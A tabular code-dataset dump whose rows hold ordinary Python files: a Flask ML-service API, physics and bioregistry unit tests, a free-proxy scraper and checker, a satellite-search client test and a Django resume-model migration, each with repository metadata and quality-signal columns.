hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ea931348dc1add94d3976c115411349771183b34 | 6,818 | py | Python | src/mlServiceAPI.py | juliangruendner/ketos_brain_api | 6ec7e01a0996abb03dba090d832a5e1020df4180 | [
"MIT"
] | null | null | null | src/mlServiceAPI.py | juliangruendner/ketos_brain_api | 6ec7e01a0996abb03dba090d832a5e1020df4180 | [
"MIT"
] | null | null | null | src/mlServiceAPI.py | juliangruendner/ketos_brain_api | 6ec7e01a0996abb03dba090d832a5e1020df4180 | [
"MIT"
] | null | null | null | from flask import Flask
from flask_restful_swagger_2 import Api
from resources.userResource import UserListResource, UserResource, UserLoginResource
from resources.imageResource import ImageListResource, ImageResource
from resources.environmentResource import EnvironmentListResource, EnvironmentResource, UserEnvironmentListResource
from resources.featureResource import FeatureListResource, FeatureResource, UserFeatureListResource
from resources.featureSetResource import FeatureSetListResource, FeatureSetResource, UserFeatureSetListResource, FeatureSetFeatureListResource
from resources.mlModelResource import MLModelListResource, MLModelResource, UserMLModelListResource, MLModelPredicitionResource
from resources.mlModelResource import MLModelExportResource, MLModelImportResource, MLModelImportSuitableEnvironmentResource, MLModelImportSuitableFeatureSetResource
from resources.dataResource import DataListResource, DataResource
from resources.resourceConfigResource import ResourceConfig
from resources.annotationResource import AnnotationTaskListResource, AnnotationTaskResource, UserAnnotationTaskListResource, AnnotationTaskEntryListResource, AnnotationTaskResultListResource, AnnotatorResource
from resources.annotationResource import AnnotationTaskScaleEntryListResource, AnnotationTaskAnnotatorListResource, AnnotationResultListResource, AnnotatorResultListResource, EntriesForAnnotatorResource, AnnotationTaskScaleEntry
from resources.predictionOutcomeResource import ModelPredictionOutcomeListResource, PredictionOutcomeListResource, PredictionOutcomeResource
from resources.atlasCohortResource import AtlasCohortResource
from rdb.rdb import connect_to_db, create_all, create_admin_user, create_default_images, create_default_features
from flask_cors import CORS
import json
import logging
import logging.config
logging.config.dictConfig(json.load(open("logging_config.json", "r")))
app = Flask(__name__)
CORS(app)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
api = Api(app,
add_api_spec_resource=True, api_version='0.0', api_spec_url='/api/swagger', schemes=["http"], #, "https", {"securitySchemes": {"basicAuth": {"type": "http"}}}],
security=[{"basicAuth": []}], security_definitions={"basicAuth": {"type": "basic"}}) # Wrap the Api and add /api/swagger endpoint
connect_to_db(app)
create_all()
create_admin_user()
create_default_images()
create_default_features()
api.add_resource(UserListResource, '/users', endpoint='users')
api.add_resource(UserLoginResource, '/users/login', endpoint='user_login')
api.add_resource(UserResource, '/users/<int:user_id>', endpoint='user')
api.add_resource(UserEnvironmentListResource, '/users/<int:user_id>/environments', endpoint='environments_for_user')
api.add_resource(UserMLModelListResource, '/users/<int:user_id>/models', endpoint='models_for_user')
api.add_resource(UserFeatureListResource, '/users/<int:user_id>/features', endpoint='features_for_user')
api.add_resource(UserFeatureSetListResource, '/users/<int:user_id>/featuresets', endpoint='feature_sets_for_user')
api.add_resource(EnvironmentListResource, '/environments', endpoint='environments')
api.add_resource(EnvironmentResource, '/environments/<int:env_id>', endpoint='environment')
api.add_resource(MLModelListResource, '/models', endpoint='models')
api.add_resource(MLModelResource, '/models/<int:model_id>', endpoint='model')
api.add_resource(MLModelExportResource, '/models/<int:model_id>/export', endpoint='model_export')
api.add_resource(MLModelImportResource, '/models/import', endpoint='model_import')
api.add_resource(MLModelImportSuitableEnvironmentResource, '/models/import/suitable-environments', endpoint='model_import_suitable_environments')
api.add_resource(MLModelImportSuitableFeatureSetResource, '/models/import/suitable-feature-sets', endpoint='model_import_suitable_feature_sets')
api.add_resource(MLModelPredicitionResource, '/models/<int:model_id>/prediction', endpoint='model_prediction')
api.add_resource(ImageListResource, '/images', endpoint='images')
api.add_resource(ImageResource, '/images/<int:image_id>', endpoint='image')
api.add_resource(DataListResource, '/data', endpoint='datalist')
api.add_resource(DataResource, '/data/<datarequest_id>', endpoint='data')
api.add_resource(FeatureListResource, '/features', endpoint='features')
api.add_resource(FeatureResource, '/features/<int:feature_id>', endpoint='feature')
api.add_resource(FeatureSetListResource, '/featuresets', endpoint='feature_sets')
api.add_resource(FeatureSetResource, '/featuresets/<int:feature_set_id>', endpoint='feature_set')
api.add_resource(FeatureSetFeatureListResource, '/featuresets/<int:feature_set_id>/features', endpoint='feature_set_features')
api.add_resource(ResourceConfig, '/resources_config', endpoint='resources_config')
api.add_resource(AnnotationTaskListResource, '/annotation_tasks', endpoint='annotation_tasks')
api.add_resource(AnnotationTaskResource, '/annotation_tasks/<int:task_id>', endpoint='annotation_task')
api.add_resource(UserAnnotationTaskListResource, '/users/<int:user_id>/annotation_tasks', endpoint='annotation_tasks_for_user')
api.add_resource(AnnotationTaskEntryListResource, '/annotation_tasks/<int:task_id>/entries', endpoint='entries_for_annotation_task')
api.add_resource(AnnotationTaskScaleEntryListResource, '/annotation_tasks/<int:task_id>/scale_entries', endpoint='scale_entries_for_annotation_task')
api.add_resource(AnnotationTaskAnnotatorListResource, '/annotation_tasks/<int:task_id>/annotators', endpoint='annotators_for_annotation_task')
api.add_resource(AnnotationResultListResource, '/annotation_tasks/results', endpoint='annotation_tasks_results')
api.add_resource(AnnotatorResultListResource, '/annotators/<int:annotator_id>/results', endpoint='results_for_annotator')
api.add_resource(AnnotationTaskResultListResource, '/annotation_tasks/<int:task_id>/results', endpoint='results_for_annotation_task')
api.add_resource(EntriesForAnnotatorResource, '/annotators/<string:token>/entries', endpoint='entries_for_annotators')
api.add_resource(AnnotatorResource, '/annotators/<string:token>', endpoint='annotator')
api.add_resource(AnnotationTaskScaleEntry, '/annotation_tasks/<int:task_id>/scale_entries/<int:scale_entry_id>', endpoint='scale_entry')
api.add_resource(AtlasCohortResource, '/atlas/cohorts/<int:cohort_id>/patients', endpoint='patients_for_atlas_cohort')
api.add_resource(ModelPredictionOutcomeListResource, '/models/<int:model_id>/outcomes', endpoint='prediction_outcomes')
api.add_resource(PredictionOutcomeListResource, '/models/prediction/outcomes', endpoint='model_prediction_outcome')
api.add_resource(PredictionOutcomeResource, '/models/outcomes/<int:pred_outcome_id>', endpoint='prediction_outcome')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=5000)
| 80.211765 | 228 | 0.839689 | 703 | 6,818 | 7.880512 | 0.203414 | 0.045487 | 0.106137 | 0.015162 | 0.143321 | 0.061011 | 0.049819 | 0.023105 | 0.023105 | 0.023105 | 0 | 0.001691 | 0.045908 | 6,818 | 84 | 229 | 81.166667 | 0.849962 | 0.01584 | 0 | 0 | 0 | 0 | 0.288163 | 0.209153 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.302632 | 0 | 0.302632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
ea983ff474c1e9c14d38adcbbefd09dbeedc005c | 5,529 | py | Python | tests/test_volume.py | mathieuboudreau/electropy | 586f93b076448f39255727ff36afe50edb6255bc | [
"MIT"
] | 5 | 2019-04-06T02:40:34.000Z | 2020-09-09T20:31:56.000Z | tests/test_volume.py | mathieuboudreau/electropy | 586f93b076448f39255727ff36afe50edb6255bc | [
"MIT"
] | 6 | 2019-04-06T02:40:36.000Z | 2021-03-03T17:46:07.000Z | tests/test_volume.py | mathieuboudreau/electropy | 586f93b076448f39255727ff36afe50edb6255bc | [
"MIT"
] | 1 | 2020-04-10T19:22:17.000Z | 2020-04-10T19:22:17.000Z | import unittest
from electropy.charge import Charge
import numpy as np
from electropy import volume
class VolumeTest(unittest.TestCase):
def setUp(self):
self.position_1 = [0, 0, 0]
self.position_2 = [-2, 4, 1]
self.charge = 7e-9
def tearDown(self):
pass
# Potential function volume tests
def test_potential_volume_at_point_equal_class_potential(self):
charge = Charge(self.position_1, self.charge)
potential_volume = volume.potential(
[charge],
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
)
# Point = [-6, -6, -6]
potential_at_point = potential_volume[4][4][4]
expected_potential = charge.potential([-6, -6, -6])
np.testing.assert_equal(potential_at_point, expected_potential)
def test_two_charge_potential_volume_eq_sum_of_class_potential(self):
charges = [Charge(self.position_1, self.charge)]
charges.append(Charge(self.position_2, -self.charge))
potential_volume = volume.potential(
charges,
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
)
# Point = [-6, -5, -3]
potential_at_point = potential_volume[4][5][7]
expected_potential = np.add(
charges[0].potential([-6, -5, -3]),
charges[1].potential([-6, -5, -3]),
)
np.testing.assert_equal(potential_at_point, expected_potential)
# Field function volume tests
def test_field_volume_at_point_equal_class_field(self):
charge = Charge(self.position_1, self.charge)
field_volume = volume.field(
[charge],
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
)
# Point = [-10, -6, -3]
field_at_point = field_volume[0][4][7]
expected_field = charge.field([-10, -6, -3])
np.testing.assert_equal(field_at_point, expected_field)
def test_two_charge_field_volume_eq_sum_of_class_field(self):
charges = [Charge(self.position_1, self.charge)]
charges.append(Charge(self.position_2, -self.charge))
field_volume = volume.field(
charges,
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
)
# Point = [-6, -5, -3]
field_at_point = field_volume[4][5][7]
expected_field = np.add(
charges[0].field([-6, -5, -3]), charges[1].field([-6, -5, -3])
)
np.testing.assert_equal(field_at_point, expected_field)
def test_charge_field_volume_x_components_eq_sum_of_class_field_x(self):
charges = [Charge(self.position_1, self.charge)]
charges.append(Charge(self.position_2, -self.charge))
field_volume = volume.field(
charges,
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
component="x",
)
# Point = [-6, -5, -3]
field_at_point = field_volume[4][5][7]
expected_field = np.add(
charges[0].field([-6, -5, -3], component="x"),
charges[1].field([-6, -5, -3], component="x"),
)
np.testing.assert_equal(field_at_point, expected_field)
def test_charge_field_volume_y_components_eq_sum_of_class_field_y(self):
charges = [Charge(self.position_1, self.charge)]
charges.append(Charge(self.position_2, -self.charge))
field_volume = volume.field(
charges,
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
component="y",
)
# Point = [-6, -5, -3]
field_at_point = field_volume[4][5][7]
expected_field = np.add(
charges[0].field([-6, -5, -3], component="y"),
charges[1].field([-6, -5, -3], component="y"),
)
np.testing.assert_equal(field_at_point, expected_field)
def test_charge_field_volume_z_components_eq_sum_of_class_field_z(self):
charges = [Charge(self.position_1, self.charge)]
charges.append(Charge(self.position_2, -self.charge))
field_volume = volume.field(
charges,
x_range=[-10, 10],
y_range=[-10, 10],
z_range=[-10, 10],
h=1,
component="z",
)
# Point = [-6, -5, -3]
field_at_point = field_volume[4][5][7]
expected_field = np.add(
charges[0].field([-6, -5, -3], component="z"),
charges[1].field([-6, -5, -3], component="z"),
)
np.testing.assert_equal(field_at_point, expected_field)
def test_field_returns_singleton_dim_for_single_slice(self):
charge = Charge(self.position_1, self.charge)
field_volume = volume.field(
[charge],
x_range=[-10, 10],
y_range=[1, 1],
z_range=[-10, 10],
h=0.1,
)
expected_shape = (201, 1, 201)
actual_shape = field_volume.shape
np.testing.assert_equal(actual_shape, expected_shape)
def test__arange_almost_equals_numpy_arange(self):
actual = volume._arange(-10, 10, 0.1) # Mine is rounder anyways =)
expected = np.arange(-10, 10 + 0.1, 0.1)
np.testing.assert_almost_equal(actual, expected)
| 28.06599 | 76 | 0.558691 | 707 | 5,529 | 4.100424 | 0.09901 | 0.034495 | 0.071404 | 0.052432 | 0.772335 | 0.705071 | 0.619524 | 0.591928 | 0.578475 | 0.541911 | 0 | 0.061622 | 0.304395 | 5,529 | 196 | 77 | 28.209184 | 0.692148 | 0.042322 | 0 | 0.556391 | 0 | 0 | 0.001703 | 0 | 0 | 0 | 0 | 0 | 0.067669 | 1 | 0.082707 | false | 0.007519 | 0.030075 | 0 | 0.120301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ea9d55f992bddeb052a30ca5d5fa389dffc4128f | 2,877 | py | Python | auctionCrawler/poxy.py | wd18535470628/PythonCraw | 9be3519da1219ad4ffc0d26cc97ceabcb0a7c06b | [
"Apache-2.0"
] | null | null | null | auctionCrawler/poxy.py | wd18535470628/PythonCraw | 9be3519da1219ad4ffc0d26cc97ceabcb0a7c06b | [
"Apache-2.0"
] | null | null | null | auctionCrawler/poxy.py | wd18535470628/PythonCraw | 9be3519da1219ad4ffc0d26cc97ceabcb0a7c06b | [
"Apache-2.0"
] | null | null | null | #-*- coding=utf-8 -*-
import urllib2, time, datetime
from lxml import etree
import sqlite3,time
class getProxy():
def __init__(self):
self.user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
self.header = {"User-Agent": self.user_agent}
self.dbname="proxy.db"
self.now = time.strftime("%Y-%m-%d")
def getContent(self, num):
nn_url = "http://www.xicidaili.com/nn/" + str(num)
#国内高匿
req = urllib2.Request(nn_url, headers=self.header)
resp = urllib2.urlopen(req, timeout=10)
content = resp.read()
et = etree.HTML(content)
result_even = et.xpath('//tr[@class=""]')
result_odd = et.xpath('//tr[@class="odd"]')
#因为网页源码中class 分开了奇偶两个class,所以使用lxml最方便的方式就是分开获取。
#刚开始我使用一个方式获取,因而出现很多不对称的情况,估计是网站会经常修改源码,怕被其他爬虫的抓到
#使用上面的方法可以不管网页怎么改,都可以抓到ip 和port
for i in result_even:
t1 = i.xpath("./td/text()")[:2]
print "IP:%s\tPort:%s" % (t1[0], t1[1])
if self.isAlive(t1[0], t1[1]):
self.insert_db(self.now,t1[0],t1[1])
for i in result_odd:
t2 = i.xpath("./td/text()")[:2]
print "IP:%s\tPort:%s" % (t2[0], t2[1])
if self.isAlive(t2[0], t2[1]):
self.insert_db(self.now,t2[0],t2[1])
def insert_db(self,date,ip,port):
dbname=self.dbname
try:
conn=sqlite3.connect(dbname)
except:
print "Error to open database%" %self.dbname
create_tb='''
CREATE TABLE IF NOT EXISTS PROXY
(DATE TEXT,
IP TEXT,
PORT TEXT
);
'''
conn.execute(create_tb)
insert_db_cmd='''
INSERT INTO PROXY (DATE,IP,PORT) VALUES ('%s','%s','%s');
''' %(date,ip,port)
conn.execute(insert_db_cmd)
conn.commit()
conn.close()
def loop(self,page):
for i in range(1,page):
self.getContent(i)
#查看爬到的代理IP是否还能用
def isAlive(self,ip,port):
proxy={'http':ip+':'+port}
print proxy
#使用这个方式是全局方法。
proxy_support=urllib2.ProxyHandler(proxy)
opener=urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
#使用代理访问腾讯官网,进行验证代理是否有效
test_url="http://www.qq.com"
req=urllib2.Request(test_url,headers=self.header)
try:
#timeout 设置为10,如果你不能忍受你的代理延时超过10,就修改timeout的数字
resp=urllib2.urlopen(req,timeout=10)
if resp.code==200:
print "work"
return True
else:
print "not work"
return False
except :
print "Not work"
return False
if __name__ == "__main__":
now = datetime.datetime.now()
print "Start at %s" % now
obj=getProxy()
obj.loop(5) | 30.284211 | 91 | 0.54814 | 355 | 2,877 | 4.343662 | 0.391549 | 0.02594 | 0.01751 | 0.011673 | 0.129702 | 0.09987 | 0.035019 | 0.035019 | 0.035019 | 0.035019 | 0 | 0.030257 | 0.31074 | 2,877 | 95 | 92 | 30.284211 | 0.747353 | 0.083768 | 0 | 0.108108 | 0 | 0.013514 | 0.180746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.040541 | null | null | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ea9e52a902c07d07faf47b9e8450b5190bcaf693 | 214 | py | Python | Agents/utils/readMonFiles.py | mbay-SAG/cumulocity-thinedge-example | e0fa9a52fab16ad791093e0ab3d4383c653a10fd | [
"Apache-2.0"
] | 1 | 2021-03-12T12:22:46.000Z | 2021-03-12T12:22:46.000Z | Agents/utils/readMonFiles.py | mbay-SAG/cumulocity-thinedge-example | e0fa9a52fab16ad791093e0ab3d4383c653a10fd | [
"Apache-2.0"
] | 2 | 2020-11-20T16:58:35.000Z | 2020-11-25T15:37:06.000Z | Agents/utils/readMonFiles.py | SoftwareAG/cumulocity-thinedge-example | 6311a7f2e3d6515b85af5de24758f799e389aaed | [
"Apache-2.0"
] | null | null | null | import sys
def content(name):
try:
with open('../apama-mqtt-connect/monitors/' + str(name) + '.mon', 'r') as file:
data = file.read()
return data
except:
return []
| 19.454545 | 87 | 0.509346 | 25 | 214 | 4.36 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.336449 | 214 | 10 | 88 | 21.4 | 0.767606 | 0 | 0 | 0 | 0 | 0 | 0.168224 | 0.14486 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ea9e964b93453f94a10dfd91125416960a5c91b6 | 1,046 | py | Python | tests/test_search.py | capellaspace/console-client | bad631f207043231630c9b8c0893a1b4382d4061 | [
"MIT"
] | 23 | 2021-07-28T19:32:25.000Z | 2022-03-19T07:57:36.000Z | tests/test_search.py | capellaspace/console-client | bad631f207043231630c9b8c0893a1b4382d4061 | [
"MIT"
] | 6 | 2021-07-16T22:31:56.000Z | 2022-03-11T21:09:40.000Z | tests/test_search.py | capellaspace/console-client | bad631f207043231630c9b8c0893a1b4382d4061 | [
"MIT"
] | 1 | 2022-01-05T18:38:46.000Z | 2022-01-05T18:38:46.000Z | #!/usr/bin/env python
import pytest
from .test_data import get_search_test_cases, search_catalog_get_stac_ids
from capella_console_client import client
from capella_console_client.validate import _validate_uuid
from capella_console_client.search import _paginated_search
@pytest.mark.parametrize("search_args,expected", get_search_test_cases())
def test_search(search_args, expected, search_client):
search_client.search(**search_args)
assert client._paginated_search.call_args[0][1] == expected
def test_validate_uuid_raises():
with pytest.raises(ValueError):
_validate_uuid("123")
def test_paginated_search_single_page(single_page_search_client):
results = _paginated_search(single_page_search_client._sesh, payload={"limit": 1})
assert len(results) == 1
assert results[0] == search_catalog_get_stac_ids()["features"][0]
def test_paginated_search_multi_page(multi_page_search_client):
results = _paginated_search(multi_page_search_client._sesh, payload={"limit": 10})
assert len(results) == 10
| 33.741935 | 86 | 0.799235 | 145 | 1,046 | 5.317241 | 0.303448 | 0.116732 | 0.083009 | 0.093385 | 0.241245 | 0.181582 | 0 | 0 | 0 | 0 | 0 | 0.013934 | 0.108031 | 1,046 | 30 | 87 | 34.866667 | 0.812433 | 0.01912 | 0 | 0 | 0 | 0 | 0.04 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.210526 | false | 0 | 0.263158 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
575f3985ac6999b8a0ba401f38fcd2e12e1655c9 | 2,109 | py | Python | app_jumanji/migrations/0007_resume.py | arifgafizov/jumanji_v2 | e06ec7556544abef66b35cace5a0456f6021bcca | [
"MIT"
] | 1 | 2021-12-02T11:23:39.000Z | 2021-12-02T11:23:39.000Z | app_jumanji/migrations/0007_resume.py | arifgafizov/jumanji_v2 | e06ec7556544abef66b35cace5a0456f6021bcca | [
"MIT"
] | null | null | null | app_jumanji/migrations/0007_resume.py | arifgafizov/jumanji_v2 | e06ec7556544abef66b35cace5a0456f6021bcca | [
"MIT"
] | null | null | null | # Generated by Django 3.0.8 on 2020-08-16 18:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('app_jumanji', '0006_auto_20200815_2218'),
]
operations = [
migrations.CreateModel(
name='Resume',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('surname', models.CharField(max_length=100)),
('status', models.CharField(choices=[('not_in_search', 'Не ищу работу'),
('consideration', 'Рассматриваю предложения'), ('in_search', 'Ищу работу')], max_length=100)),
('salary', models.FloatField()),
('specialty', models.CharField(choices=[('frontend', 'Фронтенд'), ('backend', 'Бэкенд'),
('gamedev', 'Геймдев'), ('devops', 'Девопс'), ('design', 'Дизайн'), ('products', 'Продукты'),
('management', 'Менеджмент'), ('testing', 'Тестирование')], max_length=100)),
('grade', models.CharField(choices=[('intern', 'intern'), ('junior', 'junior'), ('middle', 'middle'),
('senior', 'senior'), ('lead', 'lead')], max_length=100)),
('education', models.CharField(choices=[('missing', 'Отсутствует'), ('secondary', 'Среднее'),
('vocational', 'Средне-специальное'), ('incomplete_higher', 'Неполное высшее'),
('higher', 'Высшее')], max_length=100)),
('experience', models.CharField(max_length=500)),
('portfolio', models.CharField(max_length=500)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resume', to=settings.AUTH_USER_MODEL)),
],
),
]
| 54.076923 | 141 | 0.556188 | 191 | 2,109 | 6.005236 | 0.570681 | 0.104621 | 0.062772 | 0.083697 | 0.094159 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035971 | 0.275012 | 2,109 | 38 | 142 | 55.5 | 0.714192 | 0.021337 | 0 | 0 | 1 | 0 | 0.235209 | 0.011154 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.09375 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5766b267912e78674e78fd7d2805ec7078a5c543 | 4,072 | py | Python | tests/test_metaregistry.py | kkaris/bioregistry | e8cdaf8e8c5670873ce10a5a67d7850b76e5eff7 | [
"MIT"
] | null | null | null | tests/test_metaregistry.py | kkaris/bioregistry | e8cdaf8e8c5670873ce10a5a67d7850b76e5eff7 | [
"MIT"
] | null | null | null | tests/test_metaregistry.py | kkaris/bioregistry | e8cdaf8e8c5670873ce10a5a67d7850b76e5eff7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Tests for the metaregistry."""
import unittest
import bioregistry
from bioregistry.export.rdf_export import metaresource_to_rdf_str
from bioregistry.schema import Registry
class TestMetaregistry(unittest.TestCase):
"""Tests for the metaregistry."""
def test_minimum_metadata(self):
"""Test the metaregistry entries have a minimum amount of data."""
for metaprefix, registry_pydantic in bioregistry.read_metaregistry().items():
self.assertIsInstance(registry_pydantic, Registry)
data = registry_pydantic.dict()
with self.subTest(metaprefix=metaprefix):
self.assertIn('name', data)
self.assertIn('homepage', data)
self.assertIn('example', data)
self.assertIn('description', data)
# When a registry is a provider, it means it
# provides for its entries
self.assertIn('provider', data)
if data['provider']:
self.assertIn('provider_url', data)
self.assertIn('$1', data['provider_url'])
# When a registry is a resolver, it means it
# can resolve entries (prefixes) + identifiers
self.assertIn('resolver', data)
if data['resolver']:
self.assertIn('resolver_url', data)
self.assertIn('$1', data['resolver_url'])
self.assertIn('$2', data['resolver_url'])
invalid_keys = set(data).difference({
'prefix', 'name', 'homepage', 'download',
'provider', 'resolver', 'description', 'provider_url',
'example', 'resolver_url', 'contact',
})
self.assertEqual(set(), invalid_keys, msg='invalid metadata')
def test_get_registry(self):
"""Test getting a registry."""
self.assertIsNone(bioregistry.get_registry('nope'))
self.assertIsNone(bioregistry.get_registry_name('nope'))
self.assertIsNone(bioregistry.get_registry_homepage('nope'))
self.assertIsNone(bioregistry.get_registry_url('nope', ...))
self.assertIsNone(bioregistry.get_registry_example('nope'))
self.assertIsNone(bioregistry.get_registry_description('nope'))
